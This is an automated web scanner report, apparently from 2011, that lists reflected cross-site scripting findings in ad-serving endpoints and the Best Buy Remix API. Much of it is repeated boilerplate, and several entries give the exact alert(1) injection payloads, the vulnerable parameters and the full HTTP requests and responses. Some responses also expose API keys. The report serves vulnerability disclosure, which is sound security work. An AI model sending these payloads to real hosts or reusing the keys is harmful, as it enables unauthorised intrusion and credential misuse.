This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5525"-alert(1)-"4c9c6b245a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b1be"-alert(1)-"38f00f74b60 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f518"-alert(1)-"5e391f5e27c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e8db"-alert(1)-"34400a44cf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f41c"-alert(1)-"9daea6c72f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56835"-alert(1)-"35529e80084 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a70a2"-alert(1)-"4d9258f54d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8cf4"-alert(1)-"728edc0a87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bf2a"-alert(1)-"9bdd8378318 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6306a"-alert(1)-"90f8bc51e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18951"-alert(1)-"18895c5edbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b5c1"-alert(1)-"efd1d275b29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc2e6"-alert(1)-"a88223141ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbaea"-alert(1)-"eeefe3ca7cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32362"-alert(1)-"036c1a3cc14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23685"-alert(1)-"11221a24f63 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2228"-alert(1)-"3f6a5914556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65dbb"-alert(1)-"0eb3d0faa8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 365e5"-alert(1)-"f04d5429c5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bd4d"-alert(1)-"e75f5f53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5603a"-alert(1)-"122445a79d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8620f"-alert(1)-"fc120b5733 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20fd1"-alert(1)-"c4cad94f04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d26a"-alert(1)-"002706296ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6761"-alert(1)-"f29ca89fea7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 104ac"-alert(1)-"0dceffe146a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9063"-alert(1)-"f157f019c33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee42c"-alert(1)-"efc55fb88e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da2e1"-alert(1)-"09160422661 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 608bd"-alert(1)-"f66b54a0fd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81763"-alert(1)-"1b4c8ebcd37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c66c'%3balert(1)//7a5ab1f91b4 was submitted in the admeld_adprovider_id parameter. This input was echoed as 2c66c';alert(1)//7a5ab1f91b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=782c66c'%3balert(1)//7a5ab1f91b4&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld-match.dotomi.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/257/campusfood/728x90/campusfood_atf?t=1313102872367&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcdn2.allmenus.com.s3.amazonaws.com%2Fv50%2Fcommon%2Fstatic%2Fadvertisements.html%3Fserver%3Dwww.allmenus.com%26slot%3Dam_50_header_leaderboard%26ignore%3Dtrue&refer=http%3A%2F%2Fwww.allmenus.com%2Fny%2Fnew-york%2F297850-underground-pizza%2Finfo%2F User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 11 Aug 2011 22:49:32 GMT X-Name: rtb-s10 Cache-Control: max-age=0, no-store Content-Type: text/javascript Connection: close Content-Length: 160
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 456c5'%3balert(1)//640b1256e6d was submitted in the admeld_callback parameter. This input was echoed as 456c5';alert(1)//640b1256e6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match456c5'%3balert(1)//640b1256e6d HTTP/1.1 Host: admeld-match.dotomi.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/257/campusfood/728x90/campusfood_atf?t=1313102872367&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcdn2.allmenus.com.s3.amazonaws.com%2Fv50%2Fcommon%2Fstatic%2Fadvertisements.html%3Fserver%3Dwww.allmenus.com%26slot%3Dam_50_header_leaderboard%26ignore%3Dtrue&refer=http%3A%2F%2Fwww.allmenus.com%2Fny%2Fnew-york%2F297850-underground-pizza%2Finfo%2F User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 11 Aug 2011 22:49:28 GMT X-Name: rtb-s07 Cache-Control: max-age=0, no-store Content-Type: text/javascript Connection: close Content-Length: 160
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffdde'-alert(1)-'de9a7a700f7 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0848'-alert(1)-'85376933358 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1428a'%3balert(1)//b1769215d63 was submitted in the admeld_adprovider_id parameter. This input was echoed as 1428a';alert(1)//b1769215d63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24449'%3balert(1)//0713bdddb9d was submitted in the admeld_callback parameter. This input was echoed as 24449';alert(1)//0713bdddb9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 55836<script>alert(1)</script>67f7e0a0ca5 was submitted in the cc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ag.asp?cc=55836<script>alert(1)</script>67f7e0a0ca5&source=js&ord=2653272 HTTP/1.1 Host: adsfac.us Proxy-Connection: keep-alive Referer: http://www.informit.com/index.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 293 Content-Type: text/html Expires: Wed, 31 Aug 2011 17:53:41 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FS55836%3Cscript%3Ealert%281%29%3C%2Fscript%3E67f7e0a0ca50=uid=29247451; expires=Thu, 01-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/ Set-Cookie: FS55836%3Cscript%3Ealert%281%29%3C%2Fscript%3E67f7e0a0ca5=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4260&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Fri, 30-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/ Set-Cookie: UserID=983108392662652; expires=Fri, 30-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/ P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT" Date: Wed, 31 Aug 2011 17:54:41 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 76cc7<script>alert(1)</script>76faf0c8b84 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 31 Aug 2011 18:20:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/json; charset=utf-8 Content-Length: 172
OX.AJAST.__callbacks__.callback376cc7<script>alert(1)</script>76faf0c8b84({"ZipCode":"75244","Latitude":"32.9366","Longitude":"-96.83800","DmaName":"Dallas - Fort Worth"});
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9953f<script>alert(1)</script>8b150904b00 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41be8<script>alert(1)</script>a2b3fb1c730 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
SDSTATIC({ "error": { "examples": [ "/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml", "/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a ...[SNIP]... <YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03" ], "code": 400, "message": "Couldn't understand '/v141be8<script>alert(1)</script>a2b3fb1c730/products(digitalSku> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c0e2<script>alert(1)</script>a5010c4844b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
SDSTATIC({ "error": { "examples": [ "/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml", "/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a ...[SNIP]... <YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03" ], "code": 400, "message": "Couldn't understand '/v1/products(digitalSku>\"\"5c0e2<script>alert(1)</script>a5010c4844b&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'", "status": "400 Bad Request" }
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a72bd<script>alert(1)</script>f8c76327bfb was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.162. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 286a6<script>alert(1)</script>220fe19ac5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload 33863<script>alert(1)</script>d7fd7ee2f10 was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 7bf34<script>alert(1)</script>10daab6be was submitted in the show parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c06e<script>alert(1)</script>0dcbfca45d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
busopsLow.BTP.retLoadBTPSKUs({ "error": { "examples": [ "/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml", "/v1/products/8880044.json?apiKey=<Your ...[SNIP]... <YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03" ], "code": 400, "message": "Couldn't understand '/v17c06e<script>alert(1)</script>0dcbfca45d0/products(sku in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoad ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 820c8<script>alert(1)</script>201fb407b6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
busopsLow.BTP.retLoadBTPSKUs({ "error": { "examples": [ "/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml", "/v1/products/8880044.json?apiKey=<Your ...[SNIP]... <YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03" ], "code": 400, "message": "Couldn't understand '/v1/products(sku in(8412292)820c8<script>alert(1)</script>201fb407b6d&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&forma ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 564de<script>alert(1)</script>39279c9f405 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.168. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://api.bbyremix.bestbuy.com
Path:
/v1/products(sku%20in(8412292)&(departmentId=3))
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 82b98<script>alert(1)</script>79e8fa433a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload d5e64<script>alert(1)</script>484527ebd4e was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 6c6ee<script>alert(1)</script>9c6093a9606 was submitted in the show parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload f3a73<script>alert(1)</script>d98aef6a709 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 30842<script>alert(1)</script>de1b16eacb5 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31774%3balert(1)//23ded926607 was submitted in the var parameter. This input was echoed as 31774;alert(1)//23ded926607 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Api-Version: v2 Content-Type: application/javascript;charset=utf-8 Date: Wed, 31 Aug 2011 13:11:55 GMT Server: nginx/1.0.4 Status: 200 OK Vary: Accept-Encoding Content-Length: 367 Connection: keep-alive
var s_dmdbase_v_131774;alert(1)//23ded926607={"registry_longitude":-96.8207015991211,"registry_country_code":"US","registry_state":"TX","registry_city":"Dallas","registry_latitude":32.7825012207031,"isp":true,"registry_zip_code":"75207","registr ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 633b6<script>alert(1)</script>513203d4fd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 8a155<script>alert(1)</script>ba76e2d9a34 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8425'%3balert(1)//f2815976b98 was submitted in the REST URL parameter 1. This input was echoed as a8425';alert(1)//f2815976b98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa7d9'%3balert(1)//101192a7b4c was submitted in the REST URL parameter 1. This input was echoed as aa7d9';alert(1)//101192a7b4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d79f4'%3balert(1)//1ef7a89ad08 was submitted in the REST URL parameter 2. This input was echoed as d79f4';alert(1)//1ef7a89ad08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
